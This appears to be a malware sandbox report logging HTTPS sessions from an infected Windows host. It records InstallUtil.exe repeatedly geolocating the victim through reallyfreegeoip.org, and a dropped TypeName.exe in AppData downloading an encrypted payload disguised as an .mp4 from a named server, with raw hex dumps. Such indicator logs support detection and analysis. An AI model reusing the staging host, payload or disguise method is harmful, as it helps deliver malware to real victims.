                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              7192.168.2.549717188.114.96.34431436C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-11-11 04:17:05 UTC62OUTGET /xml/66.23.206.109 HTTP/1.1
                                                              Host: reallyfreegeoip.org
                                                              2024-11-11 04:17:05 UTC846INHTTP/1.1 200 OK
                                                              Date: Mon, 11 Nov 2024 04:17:05 GMT
                                                              Content-Type: text/xml
                                                              Content-Length: 363
                                                              Connection: close
                                                              Cache-Control: max-age=31536000
                                                              CF-Cache-Status: HIT
                                                              Age: 8
                                                              Last-Modified: Mon, 11 Nov 2024 04:16:57 GMT
                                                              Accept-Ranges: bytes
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rAbJpEB%2B4BVP98ncoVCERLQgia1oUoxR1CbpPfw2o4F5OtF9L4sQwpTA5VbE3pYEvHmxTJbdChyOqKPrzY2zRd6arNPPGOrncm%2BvRtmkRuh8f7aq5pZH4%2BC0FqknNaczuADT1SwV"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8e0b78792efa4286-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1257&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=700&delivery_rate=2227692&cwnd=251&unsent_bytes=0&cid=824202ff8c8a7b00&ts=160&x=0"
                                                              2024-11-11 04:17:05 UTC363INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 36 36 2e 32 33 2e 32 30 36 2e 31 30 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a
                                                              Data Ascii: <Response><IP>66.23.206.109</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZ


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              8192.168.2.549720188.114.96.34431436C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-11-11 04:17:06 UTC86OUTGET /xml/66.23.206.109 HTTP/1.1
                                                              Host: reallyfreegeoip.org
                                                              Connection: Keep-Alive
                                                              2024-11-11 04:17:06 UTC854INHTTP/1.1 200 OK
                                                              Date: Mon, 11 Nov 2024 04:17:06 GMT
                                                              Content-Type: text/xml
                                                              Content-Length: 363
                                                              Connection: close
                                                              Cache-Control: max-age=31536000
                                                              CF-Cache-Status: HIT
                                                              Age: 9
                                                              Last-Modified: Mon, 11 Nov 2024 04:16:57 GMT
                                                              Accept-Ranges: bytes
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LWEta9laZcN8CvT%2Fz04LD0b4XhbpqiHQ1YxALvej0zGyEhcmJHS0%2BLilAxQ%2FJ0%2B6G%2FmGhFCvZifDhzNR65g8k9vhH2Atz3a7RNo7ro3yxsXVrLIvmYObdTaiE%2F%2BW8oDjSJURA4cj"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8e0b7880da6a185d-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1317&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=700&delivery_rate=2083453&cwnd=251&unsent_bytes=0&cid=e8f23afa6e956609&ts=118&x=0"
                                                              2024-11-11 04:17:06 UTC363INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 36 36 2e 32 33 2e 32 30 36 2e 31 30 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a
                                                              Data Ascii: <Response><IP>66.23.206.109</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZ


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              9192.168.2.549719185.78.221.734436512C:\Users\user\AppData\Roaming\TypeName.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-11-11 04:17:06 UTC85OUTGET /slim/Tvifaznhqk.mp4 HTTP/1.1
                                                              Host: www.oleonidas.gr
                                                              Connection: Keep-Alive
                                                              2024-11-11 04:17:07 UTC298INHTTP/1.1 200 OK
                                                              Date: Mon, 11 Nov 2024 04:17:07 GMT
                                                              Server: Apache
                                                              Last-Modified: Mon, 11 Nov 2024 00:29:38 GMT
                                                              Accept-Ranges: bytes
                                                              Content-Length: 954376
                                                              Cache-Control: max-age=1209600
                                                              Expires: Mon, 25 Nov 2024 04:17:07 GMT
                                                              Vary: User-Agent
                                                              Connection: close
                                                              Content-Type: video/mp4
                                                              2024-11-11 04:17:07 UTC7894INData Raw: f1 3a bb 06 00 9e 8c 5b ac 04 ce a0 44 d3 66 6e 5d b4 6e 4c a8 11 1b 07 66 a0 7c e6 ff 7b ca c1 4f 5e 4e e9 bb fd 08 06 4a 78 e0 64 16 39 a1 fa 1c b2 cc 89 e3 3c 4f ee ae 5c bd 66 cc 8d 10 00 bf 2d 55 93 fa 58 9c f3 f0 5e 33 e4 b5 dd 93 57 a3 22 8f 78 5b c0 b9 09 49 7c df 59 ca f7 ad ff f5 05 a0 0d 04 87 80 e3 48 6d 8d 20 ac 13 76 94 3b fc a7 4b 4d d2 08 f7 a4 3a 08 8e aa dd 33 3b 2d 3e af 44 84 d2 88 08 49 bf f7 fe c7 85 61 bc c0 95 cf 74 22 6c 56 83 8d e4 51 71 be 88 5e 8a 84 41 fc d8 76 b0 2d 3f 03 9c ae ec 35 93 cc 79 18 89 f7 e6 6c 86 ec bd 25 bf d8 5d a4 18 ac ff db c2 14 24 79 12 85 e9 cc e0 7e 68 40 a8 26 e8 22 4a 13 fc 4e 70 1d 88 d6 c2 ef 05 7d c4 6e 55 24 68 2c 60 a7 c3 cd 48 6a 3b e0 f9 99 93 8e a2 3d e5 63 8d 0b f6 56 ff 72 5b b4 94 8e ea f6
                                                              Data Ascii: :[Dfn]nLf|{O^NJxd9<O\f-UX^3W"x[I|YHm v;KM:3;->DIat"lVQq^Av-?5yl%]$y~h@&"JNp}nU$h,`Hj;=cVr[
                                                              2024-11-11 04:17:07 UTC8000INData Raw: 63 cb 9b f4 8b da 6e 22 5f 8f 73 8c ad dc 1e b1 bb 2a a0 63 0c 93 24 e7 2f 43 ab 96 d2 06 ac b5 14 15 da cc e8 87 4a 3d 10 40 78 b8 21 71 e2 5d 9b 6a 41 de a3 96 02 86 be cc c5 d8 86 a7 71 b5 ac 34 e9 a3 c3 42 48 a9 b8 ab a5 08 39 e0 44 af 8a 1d 12 cb 4f 7b 92 e3 4d 78 52 88 e4 26 51 cd fc 84 87 56 8a 2b 36 4d 73 3e 20 74 28 a2 0a e3 bd 54 9b 00 c7 bd a2 2e 46 4b 5b 68 31 0e ec e6 83 7d bd da 2e 91 a6 a6 f9 9f 53 7b 7a a7 35 49 c7 0a 30 1d ce f4 0b 77 a6 cf af 76 a3 7c 1a 0e 26 3f ca 28 ca 7a 5f 47 83 38 ab 50 bc 3d bb 37 d8 8d c1 5e 02 22 dd 52 a0 da 53 bb 76 e6 96 a7 93 94 12 5a 5c da 2c 6a 6a 79 68 71 2d 1e cd c3 89 9e 13 a1 75 90 ea 10 6b b5 20 f4 d3 10 6e a6 90 08 6d 4a 66 78 26 da 41 e1 bc d1 31 ea 3b 9c f3 13 e0 5b 4b 97 4e 7d 36 78 09 57 c7 e0 e0
                                                              Data Ascii: cn"_s*c$/CJ=@x!q]jAq4BH9DO{MxR&QV+6Ms> t(T.FK[h1}.S{z5I0wv|&?(z_G8P=7^"RSvZ\,jjyhq-uk nmJfx&A1;[KN}6xW
                                                              2024-11-11 04:17:07 UTC8000INData Raw: e2 6f 46 fd c5 58 4f e9 f6 e9 e1 d1 d8 3c 9a 8e 12 ba 97 b0 a4 e6 8e ac 11 a5 a0 26 d8 54 37 22 bc e9 20 b9 70 4d b0 f3 db a3 2c a9 33 e2 02 80 52 91 c4 3b 77 f1 f7 44 a2 dd 6a 21 47 c7 94 e5 69 36 9f a4 6a 72 08 fd c8 21 5f 91 52 84 8e 70 df e9 8b 12 3b bb dc 36 d0 b9 25 80 56 c1 f5 1d 03 e1 65 13 ae dd 5a 9f 5c 02 cb 7d 35 96 27 90 0f bc 12 bf 52 92 be 11 da 52 b3 2b 79 87 55 d4 7e 85 db 7c 4e f0 ac cc 27 d5 63 c6 b9 a0 f2 7d 1b d3 1c e6 c7 74 b9 79 03 be bd 9f 01 8a fb 22 0c 52 a4 eb a8 e5 53 6c 9d 62 6d 48 69 0d 68 0a 91 0a 46 83 cb aa 30 9b 81 f6 23 10 18 a6 d4 59 b6 5e 08 f6 48 70 ca cd 15 01 5e 97 08 b1 e2 60 f1 1c 73 36 50 7f e9 77 ee 94 46 0b 6f 5b b8 d2 8e 23 6a d5 15 a2 68 a1 63 05 e1 e7 db 2b fc 58 01 c6 4b 64 4b 35 c9 fa 8a 03 b2 56 aa c0 ef
                                                              Data Ascii: oFXO<&T7" pM,3R;wDj!Gi6jr!_Rp;6%VeZ\}5'RR+yU~|N'c}ty"RSlbmHihF0#Y^Hp^`s6PwFo[#jhc+XKdK5V
                                                              2024-11-11 04:17:07 UTC8000INData Raw: ab 13 12 ca a5 5e b2 c8 29 4a ae 7c c1 20 0d 41 29 12 ec e4 76 80 26 1c e2 45 9b c1 03 bc a8 8f 2a ca f5 51 b1 0b eb 03 39 5b e3 c6 7b b8 66 f6 5e a2 12 e7 f5 5e 88 09 85 b1 18 89 36 1d e3 07 4d 17 54 53 6b 2f 50 b2 dd d5 c0 0c 56 9b 3f 22 83 5a d3 20 e0 14 e8 a4 b4 4f dd dc e4 40 f3 32 9d 4c 72 ce 33 dd 7f 88 eb ed 8f fc 58 3e 13 ef 10 1b bb 54 f3 f1 95 a3 8c 3d dd cd 8e 60 b4 45 5c 1e e7 ed 32 df e9 17 4a e7 b2 35 6c 85 e0 2f cf 41 f0 bc b3 f6 7d 7e ed 17 25 59 89 53 b8 4b 03 41 69 b6 ae e9 49 5f cf 0a c0 8c 0c aa 8a cd b5 c5 ea 20 88 76 4a da ed 94 9b ad b9 ff d2 46 d3 0e 4f 18 64 fa cb 2b 39 72 17 bb 31 fe e3 44 c0 6e 73 16 a8 63 7f 58 8e f2 aa fa 24 18 27 c5 4d 0e 8d 85 43 4b 03 b8 01 b0 c4 dc 7b ee 2e 74 01 e9 51 84 30 5c a4 e0 2b 13 c7 01 16 19 3e
                                                              Data Ascii: ^)J| A)v&E*Q9[{f^^6MTSk/PV?"Z O@2Lr3X>T=`E\2J5l/A}~%YSKAiI_ vJFOd+9r1DnscX$'MCK{.tQ0\+>
                                                              2024-11-11 04:17:07 UTC8000INData Raw: e2 6e b4 3b c0 3d dd 92 d4 84 5c f7 08 ad 16 86 77 24 22 b4 f2 bd 73 b4 87 17 10 98 40 1a 5a fa a4 e6 5e 87 b7 02 e7 13 e1 63 8d 42 24 9b 06 9d 2a 72 8f 12 d0 54 2e f0 32 ff 27 67 24 a6 98 d9 64 07 b4 4a 04 03 92 c4 53 86 66 9f 71 37 57 88 32 62 cb 1c 70 15 ab 36 86 71 05 06 c1 d6 65 a6 21 94 f0 0c 41 ec ef 7f e5 c0 a0 7d 9a ee 6f bf e6 ba 6c 9a 10 1d ff 1c 81 a7 42 07 7f cb a4 ed 1f a3 86 90 bf 7b 94 46 f9 db 1e 3f b7 7a 6b 7a 99 a9 7f 36 9a 3f ea 16 65 a8 60 b9 af 27 cd b4 73 4f 6a 62 3d b1 32 73 1c 15 2f e0 d6 bc 3d fa c5 f9 2c d0 c4 c5 c7 e6 a0 31 5c 6e ef 06 82 b0 84 b5 cc 11 04 f0 fd d3 d2 b1 c9 dd 57 49 23 aa 47 ed 4e ac 54 73 1b df 4e 4d 9f 39 f5 8d 67 54 2c 30 a9 44 f7 a5 0f 96 87 66 07 1d 3b 3a c5 4a da 79 20 72 4d a8 22 a2 53 5e b1 d0 96 c2 bc
                                                              Data Ascii: n;=\w$"s@Z^cB$*rT.2'g$dJSfq7W2bp6qe!A}olB{F?zkz6?e`'sOjb=2s/=,1\nWI#GNTsNM9gT,0Df;:Jy rM"S^
                                                              2024-11-11 04:17:07 UTC8000INData Raw: 42 2a 18 6f f6 14 76 b8 86 35 de e2 a8 ff bf 6a 7d 29 90 ee 7f f2 00 4d c1 db dd ab 77 9c 0f 17 e2 c8 4b b0 8e 4b 62 3c 8e 10 a3 5a bf a3 ae 1c 2c 25 d2 b0 6a 97 91 65 b5 dd 67 fa 77 8a 0c f5 1c cc 97 4d a4 14 01 b0 e2 fa 28 67 0c 53 57 fc 54 63 4f 41 34 ad b6 97 cc 13 dd ac 4d b0 81 96 ff 18 0c c5 0f 6c 77 4b 54 d2 db 1d 98 f4 9a 36 55 96 ad 9c d3 86 b6 12 26 fe 3c b5 7f 06 b2 a5 12 3e 64 d8 85 49 7d bd b9 b7 43 20 f7 d1 56 f8 6d 28 a1 4a 9e 9b 55 d0 69 a3 90 12 21 0d d5 59 40 6a ba c7 30 4b 8c a4 be 14 5e 61 77 9a cc 81 89 fe 7f 8c f8 78 eb c6 d5 0f 69 1e 7d 0d 47 bd 14 c6 ff 5f a2 83 2a 1d 78 0d b3 e3 19 cd 6f 8a d1 6f c0 69 ab 63 31 86 4a 05 a7 8d c0 43 d4 57 1d ab a0 36 70 8d 8c 1a 90 78 4b 68 ea 8d 7e 60 89 60 61 f3 19 90 c3 c7 83 ba e7 03 b8 74 44
                                                              Data Ascii: B*ov5j})MwKKb<Z,%jegwM(gSWTcOA4MlwKT6U&<>dI}C Vm(JUi!Y@j0K^awxi}G_*xooic1JCW6pxKh~``atD
                                                              2024-11-11 04:17:07 UTC8000INData Raw: 2e f4 13 62 28 a0 fa f7 96 e2 45 9d d9 7d dd d4 9b 9b 6b 7b 84 46 db 4a 8d ee d8 1e d3 23 5b a9 3e 05 91 26 a9 22 37 13 df 94 62 ae 09 0c 5a e1 0f c7 b9 fd a3 e0 dd 5b 30 4d 95 47 fa 8b 4a 20 14 f3 9d cc 2d e9 ff 42 05 b4 a8 6d c2 20 30 c6 9b 69 9d 5e 84 4d 52 2b 04 1d 52 4a 6b 11 01 43 6e 7c e4 b7 f0 30 77 d7 02 a3 70 c6 d1 9b 83 6d 2c a0 eb a4 11 32 a3 2f 20 28 cd 27 51 7c ae 8e 2f 5c 59 b7 2f 3b ce c8 4e 2d b9 2f 42 f6 9b 32 68 8f 78 c8 3b 24 55 10 94 28 93 c3 34 03 4c af 75 e2 dc 9e 98 b7 eb 51 8d 8d 26 e0 37 34 5b 94 9e 5f b0 b2 5f a2 e8 3a a8 10 51 72 a2 b7 69 de f1 d0 ab 9e b9 52 c4 56 ec 99 7f 72 93 3b 69 81 39 a8 6f 90 00 eb 2a 73 1e 06 f3 06 91 fe 15 be 17 88 e8 fe db 85 f8 50 3c 17 38 f6 16 62 56 2d fc a2 03 70 7a ca 3b 71 48 ff 5d 00 7f 5a 40
                                                              Data Ascii: .b(E}k{FJ#[>&"7bZ[0MGJ -Bm 0i^MR+RJkCn|0wpm,2/ ('Q|/\Y/;N-/B2hx;$U(4LuQ&74[__:QriRVr;i9o*sP<8bV-pz;qH]Z@
                                                              2024-11-11 04:17:07 UTC8000INData Raw: f2 d8 2a 18 ca 23 8b 8d ac 2b 1a d6 d5 e9 b9 1c d9 5b 90 97 b9 a2 1a a6 60 43 c7 3d 90 e2 a6 a6 4a e8 a0 75 85 72 16 88 03 0a 5b a0 d9 08 52 a1 89 4b 5c d5 13 6a 3b 44 f7 8a 42 b3 79 ca ba 2a 3b 06 13 93 1b d4 1d e7 db d3 44 6f 3e 5b 6f cd 22 88 5f 43 3f e1 b8 61 5e 63 07 0e cc 02 37 1e fa d0 d7 db dc d1 8a ad 47 86 5d ba 97 29 29 69 6f 4d 21 be 25 5c b7 26 87 8a d2 74 89 f3 03 95 4a 80 8e 8c ff 78 9f 99 a4 26 5a 8e d0 8d 51 eb 3d b7 00 ba 49 fe 24 d2 d6 82 76 28 84 92 c0 f0 58 d1 41 6f e6 e5 5f 5b 78 40 d5 3f 78 35 c7 0d f4 16 c4 a9 d7 1e 38 19 1d 81 13 31 a3 8e fe f1 c2 6f ba 42 e9 9b 53 42 9f cd 82 0d 3f a7 f4 a5 74 33 ec 23 b7 0a 13 fe b7 34 8c 84 66 7b df ce b5 bf af 7a 35 7f ff 75 3a 36 af 39 7b 47 b2 7a f4 b4 2f 7c a7 86 a5 0c 2f 88 a7 af af 1f 1b
                                                              Data Ascii: *#+[`C=Jur[RK\j;DBy*;Do>[o"_C?a^c7G]))ioM!%\&tJx&ZQ=I$v(XAo_[x@?x581oBSB?t3#4f{z5u:69{Gz/|/
                                                              2024-11-11 04:17:07 UTC8000INData Raw: d2 d0 e6 c8 7e a5 f3 dd 7e ca a3 4e a1 9c a3 33 8d 85 3b 6b c3 19 2c 8e 5e 06 54 1a 68 82 c3 03 31 02 af ba d2 f9 bb bb fa 2f 33 e2 ea 4d 7a bd 67 d1 47 0b d6 a4 1e d4 f5 7b b4 18 84 23 ad 82 bd 72 fe e3 12 28 cd cd 11 a2 db cc 19 f2 11 1a ff 24 34 98 4c 5b f6 78 31 c4 f3 74 da b9 ed 94 2b bb 19 c0 5f 3d 10 16 78 39 de fd b0 c2 04 f2 25 a0 a3 f8 7d 28 44 5c f3 c2 ac b9 0a 0e 85 98 e0 2b 97 3a 86 84 53 32 fc d1 76 0b 1b a4 84 34 f7 2c fe 77 9f 4c f4 8f c6 cd ec 33 3a 75 9e f2 61 6d 11 bf 63 bf 43 b5 9e 13 70 29 b2 ee 8a 46 a3 e4 ee 49 2c 8f 52 87 76 ab d0 99 c9 1c 75 bb d1 84 f1 89 24 26 fe 80 7f 3d 7d b2 ac 36 8b 2d c5 85 21 e3 72 d4 e5 2b 41 d4 26 55 d4 e9 4d 50 f8 87 61 d4 a1 91 a3 e3 ee d9 f9 f2 d4 2a b0 37 b4 a9 8f eb 2c 02 f0 37 d7 2e 03 ad dc b4 60
                                                              Data Ascii: ~~N3;k,^Th1/3MzgG{#r($4L[x1t+_=x9%}(D\+:S2v4,wL3:uamcCp)FI,Rvu$&=}6-!r+A&UMPa*7,7.`
                                                              2024-11-11 04:17:07 UTC8000INData Raw: c0 8f d5 e4 6f 93 84 df 0a 70 6b c7 89 77 d7 5c df ba 14 19 d6 de 81 ab e9 5b 47 80 55 4d 07 5f 0a 02 10 e6 23 aa 4f 9b 73 39 93 f5 f8 af 9a 31 39 bc 9f 8c b8 b9 cf df 51 ee 55 ef 46 99 44 e2 6c e1 be 6a 69 ea de 9f 56 db d0 fb 83 af 28 6e 87 21 c6 7f 97 61 73 40 ab f0 fc b3 be b5 3c b6 59 80 99 c1 16 d4 02 4e df 54 c1 53 28 a0 c8 ec d0 a2 6f f0 d7 98 5d f9 d1 bb 10 bd 74 0b 07 dc 06 3a 67 86 8c ac 83 ba b0 2e a5 16 5a 48 ef c5 49 cf 1c 9a 2d 5f 4f b5 22 e0 a4 b9 d0 19 52 3b 5a 78 28 ce 65 b7 fe 0b a5 90 ba f0 c3 e5 b8 eb 67 31 a2 1f ec ae 0a 8b f6 4e a8 b6 14 ad d7 66 51 51 0e f2 0d ab ac 19 b9 7a 5e d3 bb 21 36 51 e2 a7 33 32 e6 fe 08 31 f3 b6 cf 6e 61 f2 b1 f7 20 8e 1f 93 09 ae 95 b5 79 1b a0 e3 26 b3 0f 84 49 59 1b 7e a6 79 6e 2b 07 06 e5 fd 23 75 d0
                                                              Data Ascii: opkw\[GUM_#Os919QUFDljiV(n!as@<YNTS(o]t:g.ZHI-_O"R;Zx(eg1NfQQz^!6Q321na y&IY~yn+#u


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              10192.168.2.549725188.114.96.34431476C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-11-11 04:17:10 UTC86OUTGET /xml/66.23.206.109 HTTP/1.1
                                                              Host: reallyfreegeoip.org
                                                              Connection: Keep-Alive
                                                              2024-11-11 04:17:11 UTC853INHTTP/1.1 200 OK
                                                              Date: Mon, 11 Nov 2024 04:17:10 GMT
                                                              Content-Type: text/xml
                                                              Content-Length: 363
                                                              Connection: close
                                                              Cache-Control: max-age=31536000
                                                              CF-Cache-Status: HIT
                                                              Age: 13
                                                              Last-Modified: Mon, 11 Nov 2024 04:16:57 GMT
                                                              Accept-Ranges: bytes
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GBng3lU38YtU1HRPtYkTeRgAElJHAxSydXt%2FYUSNvuN4Sw7rwFPZp4cmo3GRCXknzq4t2kVh5oP3Bdpv2kV1jyU%2BRb86Hg7VhXE%2FXNnRqlKVO8BUnUbLSYeopnm%2FETJe4%2BlLQS%2BT"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8e0b789b9f6d41ed-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1182&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=700&delivery_rate=2439764&cwnd=251&unsent_bytes=0&cid=b8c503b0475f9fa4&ts=476&x=0"
                                                              2024-11-11 04:17:11 UTC363INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 36 36 2e 32 33 2e 32 30 36 2e 31 30 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a
                                                              Data Ascii: <Response><IP>66.23.206.109</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZ


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              11192.168.2.549730188.114.96.34431476C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-11-11 04:17:11 UTC62OUTGET /xml/66.23.206.109 HTTP/1.1
                                                              Host: reallyfreegeoip.org
                                                              2024-11-11 04:17:11 UTC847INHTTP/1.1 200 OK
                                                              Date: Mon, 11 Nov 2024 04:17:11 GMT
                                                              Content-Type: text/xml
                                                              Content-Length: 363
                                                              Connection: close
                                                              Cache-Control: max-age=31536000
                                                              CF-Cache-Status: HIT
                                                              Age: 14
                                                              Last-Modified: Mon, 11 Nov 2024 04:16:57 GMT
                                                              Accept-Ranges: bytes
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JLSTShcQCVNmbyKRT4ELVdSkr1C%2BFd4ZpI3ohNVe8qqyHjmmyqleN%2BuHmGmVAlCSSsqOcKsCC5TMmKkQcuHVsBw3hSCDTusVflOAtMT0iHp6G1Xluqm4kGgSFSX%2F7NlaaTv9cgoN"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8e0b78a10ac772ab-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1318&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=700&delivery_rate=2195602&cwnd=249&unsent_bytes=0&cid=6ff130eb835ab461&ts=117&x=0"
                                                              2024-11-11 04:17:11 UTC363INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 36 36 2e 32 33 2e 32 30 36 2e 31 30 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a
                                                              Data Ascii: <Response><IP>66.23.206.109</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZ


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              12192.168.2.549734188.114.96.34431476C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-11-11 04:17:13 UTC86OUTGET /xml/66.23.206.109 HTTP/1.1
                                                              Host: reallyfreegeoip.org
                                                              Connection: Keep-Alive
                                                              2024-11-11 04:17:13 UTC842INHTTP/1.1 200 OK
                                                              Date: Mon, 11 Nov 2024 04:17:13 GMT
                                                              Content-Type: text/xml
                                                              Content-Length: 363
                                                              Connection: close
                                                              Cache-Control: max-age=31536000
                                                              CF-Cache-Status: MISS
                                                              Last-Modified: Mon, 11 Nov 2024 04:17:13 GMT
                                                              Accept-Ranges: bytes
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rmQ7UntHmTuN6SalgP%2BSggqMrRnH79reOX9x%2Bm7uoUlcn2x9vFRS2%2BvhzNiS2QaT%2F%2FzXCfb2dbg8GoR1gpQqbcBNuJiQFq9R4QMBNNMDVCI5e143pz23orBeDzuoWEdI3WHQEBVn"}],"group":"cf-nel","max_age":604800}
